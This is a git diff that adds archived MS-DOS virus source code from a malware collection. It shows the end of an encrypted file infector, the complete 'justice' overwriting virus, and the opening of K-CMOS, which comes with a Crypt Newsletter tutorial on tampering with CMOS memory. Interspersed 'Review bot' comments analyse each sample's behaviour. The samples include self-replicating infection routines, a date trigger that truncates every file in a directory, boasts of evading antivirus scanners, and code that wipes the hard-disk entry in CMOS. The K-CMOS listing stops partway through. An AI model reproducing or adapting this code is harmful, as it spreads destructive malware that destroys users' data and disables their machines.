+ + mov ah,2ch ; DOS get time + int 21h ; Call DOS to do it + mov [bp+KEY],dx ; Save sec + 1/100 sec + ; as the new KEY + + lea di,[bp+APPEND] ; to the heap + mov cx,START_VIRUS-DECRYPT ; Number of bytes to move + mov al,53h ; Push BX and store it + stosb ; in the append routine + lea si,[bp+DECRYPT] ; Move Crypt routines + push si ; Save SI + push cx ; Save CX + rep movsb ; Transfer the data + + lea si,[bp+WRITE_START] ; Now copy the write + mov cx,WRITE_END-WRITE_START ; routine to the heap + rep movsb ; Transfer the data + + pop cx ; Get back + pop si ; CX and SI + rep movsb ; Recopy Crypt routine + + mov ax,0c35bh ; Tack a POP BX and + stosw ; RETN on the end + + pop ax ; New START_VIRUS offset + mov word ptr [bp+DECRYPT+1],ax; Store new offset + + call APPEND ; Write the file + +; Restore original creation date and time. + + mov ax,5701h ; DOS set file date & time + mov cx,word ptr [bp+DTA+22] ; Set time + mov dx,word ptr [bp+DTA+24] ; Set date + int 21h ; Call DOS to do it + +; Close the file. + + mov ah,3eh ; DOS close file + int 21h ; Call DOS to do it + +; Restore original file attributes. + + mov cx,word ptr [bp+DTA+21] ; Get original file attribute + call SET_ATTR ; Set attribute + + pop bx ; Take CALL off stack + + +; ****** B O M B S E C T I O N ****** + +; Check to see if the virus is ready to activate. +; Put all activation tests and bombs here. 
+ +CONDITIONS: ; mov ah,2ah ; DOS get date + ; int 21h ; Call DOS to do it + ; cmp dx,1001h ; Check for Oct 1st + ; jl BOMB_DONE ; Not time yet + ; mov ah,2ch ; DOS get time + ; int 21h ; Call DOS to do it + ; cmp cl,25h ; Check for 25 min past + ; jl BOMB_DONE ; Not time yet + +BOMB: mov ah,3h ; BIOS find cursor position + mov bh,0 ; Video page 0 + int 10h ; Call BIOS to do it + push dx ; Save original Row and Column + mov cx,6 ; Number of lines to print + lea si,[bp+VERSE] ; Location of VERSE + mov dx,080ah ; Row and Column of output +PRINTLOOP: mov ah,2h ; BIOS set cursor + int 10h ; Set cursor + push dx ; Save Row and Column + mov ah,9h ; DOS print string + mov dx,si ; Location of VERSE + int 21h ; Call DOS to print it + pop dx ; Get Row and Column + inc dh ; Increment Row + add si,54 ; Go to next line of VERSE + loop PRINTLOOP ; Print all lines + + mov ah,00h ; Read character from keybd + int 16h + + pop dx ; Get original Row Column + mov ah,2h ; BIOS set cursor + int 10h ; Call BIOS to do it + +BOMB_DONE: jmp QUIT ; Go back to host program + +VERSE: db 'ÖÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ·$' + db 'º Guess what ??? º$' + db 'º You have been victimized by a virus!!! Do not º$' + db 'º try to reboot your computer or even turn it º$' + db 'º off. You might as well read this and weep! º$' + db 'ÓÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄĽ',7,7,'$' + +; Write routine to append the virus to the end of the file. + +WRITE_START: + pop bx ; Get back file handle + push bx ; Save it again + mov ah,40h ; DOS write to file + mov cx,END_VIRUS-DECRYPT ; Length of virus + lea dx,[bp+DECRYPT] ; Start from beginning of virus + int 21h ; Call DOS to do it +WRITE_END: + + +; New INT 24h handler. + +NEWINT24: mov al,3 ; Fail call + iret ; Return + + +;*** Subroutine OPEN *** +; Open a file. Takes AL as parameter. 
+
+OPEN proc near
+ mov ah,3dh ; DOS open file, read/write
+ lea dx,[bp+DTA+30] ; Point to filename we found
+ int 21h ; Call DOS to do it
+ xchg ax,bx ; Put file handle in BX
+ retn ; Return
+OPEN endp
+
+;*** Subroutine SET_ATTR ***
+; Takes CX as a parameter
+
+SET_ATTR proc near
+ mov ax,4301h ; DOS change file attr
+ lea dx,[bp+DTA+30] ; Point to file name
+ int 21h ; Call DOS
+ retn ; Return
+SET_ATTR endp
+
+
+; This area will hold all variables to be encrypted
+
+COM_MASK db '*.com',0 ; COM file mask
+EXE_MASK db '*.exe',0 ; EXE file mask
+DOTDOT db '..',0 ; Go up one directory
+COM_START db 0cdh,20h,0 ; Header for infected file
+BACKSLASH db '\' ; Backslash for directory
+
+START endp
+
+END_VIRUS equ $ ; Mark end of virus code
+
+; This data area is a scratch area and is not included in virus code.
+
+ORIG_DIR db 64 dup(?) ; Holds original directory
+
+OLDINT24 dd ? ; Storage for old INT 24 vector
+
+BUFFER db 24 dup(?) ; Read buffer and EXE header
+
+DTA db 43 dup(?) ; New DTA location
+
+APPEND: db (START_VIRUS-DECRYPT)*2+(WRITE_END-WRITE_START)+3 dup(?)
+
+ENDHEAP:
+
+ end MAIN
diff --git a/MSDOS/Virus.MSDOS.Unknown.justice.asm b/MSDOS/Virus.MSDOS.Unknown.justice.asm
new file mode 100644
index 00000000..2c33b240
--- /dev/null
+++ b/MSDOS/Virus.MSDOS.Unknown.justice.asm
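Review bot: The file header describes this sample only as `a simple non-overwriting COM and EXE infector`, which leaves an analyst tracing the whole hunk to learn what the file does when run; an archived sample should carry a behavior summary and its static indicators in that header. I'd extend the header comment with what the code shows: INT 24h is redirected to NEWINT24 (returns AL=3, failing the operation, so critical-error prompts are suppressed while files are written); an infected EXE carries `ID = 'SS'` in the header's initial-SP field (`mov word ptr [bp+BUFFER+16],ID`, checked at CHECK_EXE), while a COM is judged infected when its size equals the entry jmp target plus the virus length; the appended body is XORed with a 16-bit KEY taken from DOS time (function 2Ch, DX) at each infection, the DECRYPT loop itself being fixed code apart from the KEY word and the START_VIRUS offset; and the CONDITIONS block is fully commented out, so the VERSE box (near the `[Joshua]` string) is displayed after every infection and control returns to the host only after a keystroke (`int 16h`). Reading the fall-through from DONE_INFECTION to BOMB_DONE's `jmp QUIT`, the sample infects at most one file per run — worth confirming and stating in the header as well.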
@@ -0,0 +1,335 @@
+; Virusname: ...and justice for all
+; Country : Sweden
+; Author : Metal Militia / Immortal Riot
+; Date : 07-29-1993
+
+; This is an mutation of 808 virus by Skism in USA.
+; Many thanks to the scratch coder of the 808 virus.
+
+; We've tried this virus ourself, and it works just fine.
+; Infects one random EXE-file every run, by overwriting it
+; with the virus-code, and if the file is smaller, will "pad"
+; it out to the size of the virus anyhow.
+;
+; McAfee Scan v105 can't find it, and
+; S&S Toolkit 6.5 don't find it either.
+
+; I haven't tried with scanners like Fprot/Tbscan,
+; but they will probably report some virus structure.
+;
+; Best Regards : [Metal Militia]
+; [The Unforgiven]
+
+
+filename EQU 30 ;used to find file name
+fileattr EQU 21 ;used to find file attributes
+filedate EQU 24 ;used to find file date
+filetime EQU 22 ;used to find file time
+
+
+
+code_start EQU 0100h ;start of all .COM files
+virus_size EQU 808 ;TR 808
+
+
+code segment 'code'
+assume cs:code,ds:code,es:code
+ org code_start
+
+main proc near
+
+jmp virus_start
+
+encrypt_val db 00h
+
+virus_start:
+
+ call encrypt ;encrypt/decrypt file
+ jmp virus ;go to start of code
+
+encrypt:
+
+ push ax
+ mov bx,offset virus_code ;start encryption at data
+
+xor_loop:
+
+ mov ch,[bx] ;read current byte
+ xor cl,encrypt_val ;get encryption key
+ mov [bx],ch ;switch bytes
+ inc bx ;move bx up a byte
+ cmp bx,offset virus_code+virus_size
+ ;are we done with the encryption
+ jle xor_loop ;no? 
keep going + pop cx + ret + + +infectfile: + + mov dx,code_start ;where virus starts in memory + mov bx,handle ;load bx with handle + push bx ;save handle on stack + call encrypt ;encrypt file + pop bx ;get back bx + mov cx,virus_size ;number of bytes to write + mov ah,40h ;write to file + int 21h ; + push bx + call encrypt ;fix up the mess + pop bx + ret + +virus_code: + +wildcards db "*",0 ;search for directory argument +filespec db "*.EXE",0 ;search for EXE file argument +filespec2 db "*.*",0 ;search fro all files argument +rootdir db "\",0 ;argument for root directory +dirdata db 43 dup (?) ;holds directory DTA +filedata db 43 dup (?) ;holds files DTA +diskdtaseg dw ? ;holds disk dta segment +diskdtaofs dw ? ;holds disk dta offset +tempofs dw ? ;holds offset +tempseg dw ? ;holds segment +drivecode db ? ;holds drive code +currentdir db 64 dup (?) ;save current directory into this +handle dw ? ;holds file handle +orig_time dw ? ;holds file time +orig_date dw ? ;holds file date +orig_attr dw ? ;holds file attr +idbuffer dw 2 dup (?) ;holds virus id + +virus: + + mov ax,3000h ;get dos version + int 21h ; + cmp al,02h ;is it at least 2.00? + jb bus1 ;won't infect less than 2.00 + mov ah,2ch ;get time + int 21h ; + mov encrypt_val,dl ;save m_seconds to encrypt val so + ;theres 100 mutations possible +setdta: + + mov dx,offset dirdata ;offset of where to hold new dta + mov ah,1ah ;set dta address + int 21h ; + +newdir: + + mov ah,19h ;get drive code + int 21h ; + mov dl,al ;save drivecode + inc dl ;add one to dl, because functions differ + mov ah,47h ;get current directory + mov si, offset currentdir ;buffer to save directory in + int 21h ; + + mov dx,offset rootdir ;move dx to change to root directory + mov ah,3bh ;change directory to root + int 21h ; + +scandirs: + + mov cx,13h ;include hidden/ro directorys + mov dx, offset wildcards ;look for '*' + mov ah,4eh ;find first file + int 21h ; + cmp ax,12h ;no first file? + jne dirloop ;no dirs found? 
bail out + +bus1: + + jmp bus + +dirloop: + + mov ah,4fh ;find next file + int 21h ; + cmp ax,12h + je bus ;no more dirs found, roll out + +chdir: + + mov dx,offset dirdata+filename;point dx to fcb - filename + mov ah,3bh ;change directory + int 21h ; + + mov ah,2fh ;get current dta address + int 21h ; + mov [diskdtaseg],es ;save old segment + mov [diskdtaofs],bx ;save old offset + mov dx,offset filedata ;offset of where to hold new dta + mov ah,1ah ;set dta address + int 21h ; + +scandir: + + mov cx,07h ;find any attribute + mov dx,offset filespec ;point dx to "*.COM",0 + mov ah,4eh ;find first file function + int 21h ; + cmp ax,12h ;was file found? + jne transform + +nextexe: + + mov ah,4fh ;find next file + int 21h ; + cmp ax,12h ;none found + jne transform ;found see what we can do + + mov dx,offset rootdir ;move dx to change to root directory + mov ah,3bh ;change directory to root + int 21h ; + mov ah,1ah ;set dta address + mov ds,[diskdtaseg] ;restore old segment + mov dx,[diskdtaofs] ;restore old offset + int 21h ; + jmp dirloop + + +bus: + + jmp rollout + +transform: + + mov ah,2fh ;temporally store dta + int 21h ; + mov [tempseg],es ;save old segment + mov [tempofs],bx ;save old offset + mov dx, offset filedata + filename + + mov bx,offset filedata ;save file... + mov ax,[bx]+filedate ;date + mov orig_date,ax ; + mov ax,[bx]+filetime ;time + mov orig_time,ax ; and + mov ax,[bx]+fileattr ; + mov ax,4300h + int 21h + mov orig_attr,cx + mov ax,4301h ;change attributes + xor cx,cx ;clear attributes + int 21h ; + mov ax,3d00h ;open file - read + int 21h ; + jc fixup ;error - find another file + mov handle,ax ;save handle + mov ah,3fh ;read from file + mov bx,handle ;move handle to bx + mov cx,02h ;read 2 bytes + mov dx,offset idbuffer ;save to buffer + int 21h ; + + mov ah,3eh ;close file for now + mov bx,handle ;load bx with handle + int 21h ; + + mov bx, idbuffer ;fill bx with id string + cmp bx,02ebh ;infected? 
+ jne doit ;same - find another file + + +fixup: + mov ah,1ah ;set dta address + mov ds,[tempseg] ;restore old segment + mov dx,[tempofs] ;restore old offset + int 21h ; + jmp nextexe + + +doit: + + mov dx, offset filedata + filename + mov ax,3d02h ;open file read/write access + int 21h ; + mov handle,ax ;save handle + + call infectfile + + ;mov ax,3eh ;close file + ;int 21h + +rollout: + + mov ax,5701h ;restore original + mov bx,handle ; + mov cx,orig_time ;time and + mov dx,orig_date ;date + int 21h ; + + mov ax,4301h ;restore original attributes + mov cx,orig_attr + mov dx,offset filedata + filename + int 21h + ;mov bx,handle + ;mov ax,3eh ;close file + ;int 21h + mov ah,3bh ;try to fix this + mov dx,offset rootdir ;for speed + int 21h ; + mov ah,3bh ;change directory + mov dx,offset currentdir ;back to original + int 21h ; + mov ah,2ah ;check system date + int 21h ; + cmp cx,1993 ;is it at least 1993? + jb audi ;no? don't do it now + cmp dl,10 ;is it the 10th? + jne audi ;not yet? quit + mov dx,offset dirdata ;offset of where to hold new dta + mov ah,1ah ;set dta address + int 21h ; + mov ah,4eh ;find first file + mov cx,7h ; + mov dx,offset filespec2 ;offset *.* + +Loops: + + int 21h ; + jc audi ;error? then quit + mov ax,4301h ;find all normal files + xor cx,cx ; + int 21h ; + mov dx,offset dirdata + filename + mov ah,3ch ;fuck up all files in current dir + int 21h ; + jc audi ;error? quit + mov ah,4fh ;find next file + jmp loops ; + +audi: + + mov ax,4c00h ;end program + int 21h ; + +; Time changes, and so does the text..sorry Skism :) +; but hey! Isn't this message much fanicer then the old ? +; Yeah, right, Metal Up Your Ass! 
+ +words_ db " Metal Militia / Immortal Riot",0 + +words2 db " ...and Justice for all",0 + +words3 db " Justice is lost",0 + db " Justice is raped",0 + db " Justice is gone",0 + db " Pulling your strings",0 + db " Seeking no truth",0 + db " Winning is all",0 + db " Find it so Grim",0 + db " so true",0 + db " so real",0 + +; heh..what a lucky dog I'm, the new virus turned out to be 808 bytes, +; which means exactly like the old one..(used tlink2 /t). + +main endp +code ends + end main + + +  \ No newline at end of file diff --git a/MSDOS/Virus.MSDOS.Unknown.k-cmos.asm b/MSDOS/Virus.MSDOS.Unknown.k-cmos.asm new file mode 100644 index 00000000..208efb6a --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.k-cmos.asm 
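Review bot: The header (`Infects one random EXE-file every run, by overwriting it`) omits the date-triggered destructive payload, which is the first thing an analyst reading this archived sample needs to know. At `rollout` — reached after the infection pass and also directly via the `bus` path when nothing was infected — the code calls DOS function 2Ah and, when the year is at least 1993 (`cmp cx,1993`) and the day of the month is 10 (`cmp dl,10`), iterates `*.*` in the directory it has just changed back to via `currentdir`, clears each file's attributes (`mov ax,4301h`) and reopens it with `mov ah,3ch` (DOS create), which truncates the existing file to zero length. I'd add a header line stating that trigger and effect next to the existing description, and note that every `mov ax,3eh` close is commented out, so the handle for the infected file is never released before `audi` terminates the program. The scanner claims in the header (`McAfee Scan v105`, `S&S Toolkit 6.5`) should be marked as the author's 1993 statement rather than a present-day assessment.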
@@ -0,0 +1,1118 @@ +comment $ + + K-CM”S VIRUS for Crypt Newsletter 20 + + + In my quest to bring the latest hi-tech computer virus + toys to you, faithful reader, I have researched one of the + relatively untouched-by-viruses parts of an AT computer: + the CMOS. + + The CMOS (Complementary Metal Oxide Semiconductor) is a + low power consumption semiconductor where information such as + the current equipment settings, hard drive type, time and + date is stored and maintained using a NiCad battery that is + recharged every time you turn on the computer. (That is why + it's a good idea to turn on the computer every once in a while + if you are not using it for long periods. This prevents + battery discharge and loss of CMOS settings.) + + The CMOS in your computer is changed and set every time + you run the Setup program that comes with your BIOS (AMI, + Phoenix), and can be accessed and changed by any program + running from DOS. + + The AT CMOS RAM is divided into three areas: + + 1 - The clock/calendar bytes + 2 - The control registers + 3 - General purpose RAM. 
+ + The following table describes the CMOS RAM location and what + each byte is used for: + +OFFSET byte DESCRIPTION + +Real Clock Data + +00 Current second in BCD +01 Alarm second in BCD +02 Current minute in BCD +03 Alarm minute in BCD +04 Current Hour in BCD +05 Alarm Hour in BCD +06 Current day of week in BCD +07 Current day in BCD +08 Current month in BCD +09 Current year in BCD + +Status Registers + +0A Status Register A +0B Status Register B +0C Status Register C +0D Status Register D + +Configuration Data + +0E Diagnostic Status + Bit 7 - Clock Lost Power + Bit 6 - Bad CMOS checksum + Bit 5 - invalid config info at POST + Bit 4 - memory Size compare error at POST + Bit 3 - Fixed disk or adapter failed initialization + Bit 2 - Invalid CMOS time + Bits 1-0 - Reserved +0F Reason for Shutdown + 00 - Power on or reset + 01 - Memory Size pass + 02 - Memory test pass + 03 - memory test fail + 04 - POST end: boot system + 05 - jmp doubleword pointer with EOI + 06 - Protected tests pass + 07 - Protected tests fail + 08 - Memory size fail + 09 - INT 15h Block move + 0A - JMP double word pointer without EOI +10 Diskette Drive Types + Bits 7-4 - Diskette drive 0 type + Bits 3-0 - Diskette drive 1 type + 0000b - no drive + 0001b - 360K drive + 0010b - 1.2MB drive + 0011b - 720K drive + 0100b - 1.44 MB drive + 0101b - 2.88 MB drive +11 Reserved +12 Fixed Disk Drive Types + Bits 7-4 - Fixed Disk drive 0 type + Bits 3-0 - Fixed Disk drive 1 type + 0000b - no drive + (Note: These drives do not necessarily + correspond with the values stored at + locations 19h and 1Ah) +13 Reserved +14 Equipment Installed + Bits 7-6 - # of Diskette drives + 00b - 1 diskette drive + 01b - 2 diskette drives + Bits 5-4 - Primary Display + 00b - reserved + 01b - 40 X 25 color + 10b - 80 X 25 color + 11b - 80 X 25 monochrome + Bits 3-0 - Reserved +15 Base Memory in 1K low byte +16 Base Memory in 1K high byte +17 Expansion Memory size low byte +18 Expansion Memory size high byte +19 Fixed Disk 
Drive Type 0 +1A Fixed Disk Drive Type 1 +1B-2D Reserved +2E Configuration Data checksum high byte +2F Configuration Data checksum low byte +30 Actual Expansion Memory size low byte +31 Actual Expansion Memory size high byte +32 Century in BCD +33 Information Flag + Bit 7 - 128 Kbyte expanded + Bit 6 - Setup Flag + Bits 5-0 - Reserved +34-3F Reserved + + + + As you can see, there are a total of 63 (3F hex) bytes of + CMOS RAM, with 33 bytes used as 'reserved' memory in the + three areas; these locations are not currently defined by + the AT BIOS and might be used to store data that will be + restored after power is shut down. + + The 4 status registers (A through D) located, appropriately, at + locations 0Ah through 0Dh define the chips operating + parameters and provide information about interrupts and the + state of the real time clock chip (RTC). + + With very few restrictions all CMOS RAM locations may be + directly accessed by an application. + + Program locations 11h, 13h, and 1Bh through 2Dh are used + in calculating the CMOS checksum that the BIOS stores at + locations 2Eh and 2Fh. + + Note: If a program changes ANY bytes at locations 10h + through 2Dh it must also recalculate the checksum and store + the new value. Changing these bytes (10h -> 2Dh) without + correcting the checksum results in a 'CMOS checksum error' + forcing you to run the BIOS setup and reenter all of the CMOS + information. + + The reserved memory locations 34h through 3Fh are not used in + checksum calculations and may be changed with extreme caution + since different BIOS versions, manufacturers and hardware + configurations use this reserved CMOS RAM locations for + extended system setup information including BIOS passwords + and DMA settings. + + + To access and change a computer's CMOS RAM is very simple: + + Access is done through ports 70 hex (CMOS control/address) + and port 71 hex (CMOS data). 
+ + The process is thus: + + 1 - We specify the CMOS RAM address of the byte we want to + read or write using port 70h + + EXAMPLE: + + mov al,XX where XX = byte specifying the address (00h->3Fh) + out 70h,al + + 2 - We read or write a byte to the address specified in step + 1. + + READ EXAMPLE: + + in al,71h byte at location XX goes into AL + + WRITE EXAMPLE: + + out 71h,al byte in AL goes to location XX in the CMOS RAM + + There is one little problem: if we are writing to any of the + locations that are checksummed (10h through 2Dh), we must + change the checksum value as well; so we follow steps 1 and 2 + with the checksum values at locations 2Eh and 2Fh, combine + the bytes into one register and subtract the current byte + value from the register containing the checksum. Then we add + the value of the new byte to be put in the CMOS RAM to the + register that has the checksum, and we write the checksum, + and the new byte to the CMOS. + + While all of this might seem too complicated, I have + written a mini-CM”S toolkit, a routine that takes the address + and the new value of the byte to be put in the CMOS, and does + the dirty work of putting the values and of changing the + checksum for you. + + Read the code carefully. It will make everything become + clearer. + +;============================================================================== +CMOS_CHCKSM: + +; INPUT: +; DL = CMOS ADDRESS of BYTE TO be MODiFiED +; BL = NEW BYTE VALUE to be PUT IN CMOS RAM + +; OUTPUT: +; None. 
+; REGISTERS USED: AX,CX,BX,DX + +;************************* +; GET CMOS Checksum => CX +;************************* + + xor ax,ax + mov al,2Eh ;msb of checksum address + out 70h,al ;send address / control byte + in al,71h ;read byte + + xchg ch,al ;store al in ch + + mov al,2Fh ;lsb of checksum address + out 70h,al ;send address / control byte + in al,71h ;read byte + + xchg cl,al ;store lsb to cl + +;********************* +; Fix CMOS Checksum +;********************* + + push dx + xchg dl,al ;AL = address + out 70h,al ;send address / control byte + in al,71h ;read register + + sub cx,ax ;subtract from checksum + + add cx,bx ;update checksum value in register. + +;**************************** +; Write CMOS byte to Address +;**************************** + + pop dx + xchg dl,al ;AL = address + out 70h,al ;specify CMOS address + xchg al,bl ;new CMOS value => al + + out 71h,al ;write new CMOS byte + +;********************* +; Write CMOS Checksum +;********************* + + mov al,2Eh ;address of checksum 's msb + out 70h,al ;specify CMOS address + xchg al,ch ;msb of new checksum + + out 71h,al ;write new CMOS msb + + mov al,2Fh ;address of checksum 's lsb + out 70h,al ;specify CMOS address + xchg al,cl ;lsb of new checksum + + out 71h,al ;write new CMOS lsb + ret + +;============================================================================== + + + It is worth mentioning that for XT (8088) type computers + the CMOS routine will have no adverse effects in the + execution of the virus-infected program. + + There are many intriguing features of CMOS-attacking + viruses: The biggest one is the interaction between software + and CMOS is not stopped by common anti-virus memory + resident programs. The most talked about example of such + a virus is the South African EXEbug, which uses CMOS + manipulation to make itself difficult to remove from an + infected hard disk. 
EXEbug massages the CMOS so that if + the machine is booted from a diskette and the virus is + not in memory, the infected hard disk is not recognized. + + The list of possible problems created by a CMOS + attacking virus is long: + + 1 - CMOS checksum errors. + This will force the user to reenter all of the CMOS data. + Change any value in the correct CMOS range without + updating the checksum. + + 2 - Dead disk / hard drives. + This could drive the uninformed to presume they have + encountered a hardware problem. + + 3 - Changed hardrive types, horrendous hardrive problems. + For example: Input the hardrive type byte, subtract some small + digit from it and output the byte to the CMOS. (The checksum + must be fixed!) and a horrible mess results on subsequent + boot up. + + 4 - Changed dates, times, etc. + The uninformed could thing the Nicad battery has died, + or that his/her computer is possessed by evil, Nigerian + Deities. + + 5 - Changed BIOS passwords, inability to access a computer. + On newer AMI BIOSes you can set or change the password + required to access the computer. This topic was discussed + briefly in a recent issue of Virus News International, the + upshot being that the unsuspecting could be flummoxed into + throwing the computer out the window, or more realistically, + calling a technician. In the case where some knowledge about + computers is present, the case is opened and the jumper + found to short the CMOS. (No, you don't have to disconnect + the battery. And you didn't throw out your machine manuals + did you?) + + Although many anti-virus programs can save and restore + your CMOS values as part of their function, currently there + is only one memory resident program that checks for changes + in the CMOS: Thunderbyte's TBMEM. + + This month's example, K-CM”S, falls in category #2: it + kills all fixed disk drives by zeroing out location 12h in + the CMOS RAM. 
It also has some encryption abilities (a 16 + byte constant decryptor) and a PATH style infection routine + that actually works! + + Needless to say, careful handling is necessary as it can + spread quite rapidly. + + Important: Since K-CMOS zero's the CMOS value for the fixed + disk on execution, unless you restore the value before ending + your experiment with some software CMOS reloading tool, you + will have a dead C: drive when you finally get around to + rebooting. Keep in mind that if you don't know how to reset + your CMOS on power up using the built in BIOS setup, you will + sit there in a dumb stew wondering why you ran a virus which + unhooked your hard drive. + + To prevent this from happening, you must familiarize yourself + with the BIOS setup program. Here is a brief walkthrough which + could be used to properly restore your machine after K-CMOS + has altered your CMOS: + + 1 - BEFORE you execute K-CMOS - on power up, bring up your + BIOS setup by holding down the DEL key while you are booting + the computer. + + 2 - You will probably see a screen with a number of selections. + You will want to bring up "Change Basic CMOS Settings" or its + equivalent. Write down the values for the HD types on drives + C and D. + + 3- IF the hard drive types are "47" the you MUST record all + of the data in the displayed fields, i.e, the information + such as the number of heads, sectors, etc. Again, you MUST + do this BEFORE you run K-CMOS or you will have to look in + your manuals somewhere to get the specific HD information! + + NOTE: Newer AMI BIOSes have an auto-detect feature in the + Setup menu, so you might not have to worry about hard disk type + number, number of sectors, number of heads, etc., if you have + the feature in your computer's BIOS. The setup will do the + work for you. + + 4 - Now that you've recorded this data, you can test K-CMOS + and watch it unhook your system. On reboot, you will lose the + hard disk. 
Reboot, bring up your Setup program as above, re- + enter the values for the hard disk which you previously + recorded, exit and save. You are back in business. + + Enjoy! + +$ + +;=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- +; K-CM”S.ASM +; AUTHOR: K”hntark +; DATE: November 93 +; Size: < 1100 bytes +; +;=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- + +MAIN SEGMENT BYTE + ASSUME cs:main,ds:main,ss:nothing ;all part in one segment=com file + ORG 100h + +;********************************** +; fake host program +;********************************** + +HOST: + db 0E9h,0Ah,00 ;jmp NEAR PTR VIRUS + db ' ' + db 90h,90h,90h + mov ah,4CH + mov al,0 + int 21H ;terminate normally with dos + +;ÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ + +;********************************** +; VIRUS CODE STARTS HERE +;********************************** + +VIRUS: + + mov si,010Dh ;get starting address + +;************************************ +; Fix DS ES +;************************************ + + mov al,cs:BYTE PTR [si + COM_FLAG - VIRUS] ;save COM/EXE flag in AX + mov WORD PTR cs:[si + PSP_SEG - VIRUS],es ;save PSP segment for use in PATH search + push ax ;save COM/EXE flag + push es ;save es and ds in case file is EXE + push ds + + push cs + push cs + pop es ;es = cs + pop ds ;ds = cs + + push WORD PTR [si + ORIG_IPCS - VIRUS] ;save IP + push WORD PTR [si + ORIG_IPCS - VIRUS + 2] ;save CS + + push WORD PTR [si + ORIG_SSSP - VIRUS] ;save SS + push WORD PTR [si + ORIG_SSSP - VIRUS + 2] ;save SP + + push WORD PTR [si + START_CODE - VIRUS] + push WORD PTR [si + START_CODE - VIRUS + 2] + +;************************************ +; redirect DTA onto virus code +;************************************ + + lea dx,[si + DTA - VIRUS] ;put DTA at the end of the virus for now + mov ah,1ah ;set new DTA function to ds:dx + int 21h + +;************************************ +; KIll fixed disk drives in CMOS 
+;************************************ + + mov dx,0012h ;hard drive type register + xor bx,bx ;New hard drive type = 0 (No Fixed drive) + call CMOS_CHCKSM + +;************************************ +; MAIN Routines called from here +;************************************ + + lea bp,[si + COM_MASK - VIRUS] + call FIND_FILE ;get a com file to attack! + lea bp,[si + EXE_MASK - VIRUS] + call FIND_FILE ;get an exe file to attack! + +;ÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ + +EXIT_VIRUS: + +;************************************ +; set old DTA address +;************************************ + + mov ah,1ah + mov dx,80h ;fix dta back to ds:dx + int 21h ;host program + + pop WORD PTR [si + START_CODE - VIRUS + 2] + pop WORD PTR [si + START_CODE - VIRUS] + + cli + pop WORD PTR [si + ORIG_SSSP - VIRUS + 2] ;save SP + pop WORD PTR [si + ORIG_SSSP - VIRUS] ;save SS + sti + + pop WORD PTR [si + ORIG_IPCS - VIRUS + 2] ;save CS + pop WORD PTR [si + ORIG_IPCS - VIRUS] ;save IP + + pop ds ;restore ds + pop es ;restore es + pop ax ;restore COM_FLAG + + cmp al,00 ;com infection? + je RESTORE_COM + +;************************************ +; restore EXE.. and exit.. 
+;************************************ + + mov bx,ds ;ds has to be original one + add bx,low 10h + mov cx,bx + add bx,cs:WORD PTR [si + ORIG_SSSP - VIRUS] ;restore ss + cli + mov ss,bx + mov sp,cs:WORD PTR [si + ORIG_SSSP - VIRUS + 2] ;restore sp + sti + add cx,cs:WORD PTR [si + ORIG_IPCS - VIRUS+ 2] + push cx ;push cs + push cs:WORD PTR [si + ORIG_IPCS - VIRUS] ;push ip + db 0CBh ;retf + +;************************************ +; restore 4 original bytes to file +;************************************ + +RESTORE_COM: + push si ;save si + cld ;clear direction flag + add si,OFFSET START_CODE - OFFSET VIRUS ;source: ds:si + mov di,0100h ;destination: es:di + movsw ;shorter & faster than + movsw ;mov cx,04 and rep movsb + pop si ;restore si + +;**************************************************************** +; zero out registers for return to +; host program +;**************************************************************** + + mov ax,0100h ;return address + xor bx,bx + xor cx,cx + xor si,si + xor di,di + push ax + xor ax,ax + cwd + ret + +;ÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ + +NO_GOOD: stc + jmp GET_OUT + +QUICK_EXIT: stc ;set carry flag + ret + +;----------------------------------------------------------------------------- + +CHECK_N_INFECT_FILE: + +;****************** +; 1-Check TIME ID +;****************** + + mov cx,WORD PTR [si + DTA_File_TIME - VIRUS] ;file time from DTA + and cl,1Dh ;58 seconds? + cmp cl,1Dh + je QUICK_EXIT + +;********************************************* +; 2-Clear attributes +;********************************************* + + lea dx,[si + WORK_AREA - VIRUS] ;dx=ptr to path + current filename + xor cx,cx ;set attributes to normal + mov ax,4301h ;set file attributes to cx + int 21h ;int 21h + jc QUICK_EXIT ;error.. quit + +;***************** +; 3-OPEN FILE +;***************** + + mov ax,3D02h ;r/w access to it + int 21h + jc NO_GOOD ;error.. 
